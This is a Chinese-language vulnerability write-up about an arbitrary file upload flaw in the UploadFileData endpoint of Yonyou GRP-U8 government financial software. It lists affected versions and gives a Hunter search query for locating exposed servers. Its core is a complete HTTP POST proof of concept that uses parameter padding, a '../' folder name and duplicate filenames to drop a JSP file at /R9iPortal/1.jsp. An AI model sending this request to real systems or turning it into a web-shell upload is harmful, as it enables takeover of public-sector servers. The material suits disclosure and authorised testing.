用友GRP-U8 UploadFileData存在任意文件上传漏洞
一、漏洞简介
用友GRP-U8R10行政事业财务管理软件是用友公司专注于电子政务事业,基于云计算技术所推出的新一代产品,是我国行政事业财务领域专业的财务管理软件。用友 GRP-U8 UploadFileData接口存在任意文件上传漏洞,攻击者通过漏洞可以获取服务器权限。
二、影响版本
- 用友GRP-U8 行政事业内控管理软件(新政府会计制度专版)
- 用友GRP-U8 高校内控管理软件(Manager版)
三、资产测绘
- hunter
app.name="用友GRP-U8 OA"
- 特征
四、漏洞复现
1.访问UploadFileData
接口响应200表示可能存在漏洞
出现如下情况则表示漏洞已修复
- 通过poc上传文件
POST /UploadFileData?action=upload_file&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&foldername=%2e%2e%2f&filename=1.jsp&filename=1.jpg HTTP/1.1
Host: xx.xx.xx.xx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=59227D2C93FE3E8C2626DA625CE710F9
Content-Type: multipart/form-data
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
Content-Length: 170
------WebKitFormBoundary92pUawKc
Content-Disposition: form-data; name="myFile";filename="test.jpg"
<% out.println("0xold6");%>
------WebKitFormBoundary92pUawKc--
- 上传文件位置
/R9iPortal/1.jsp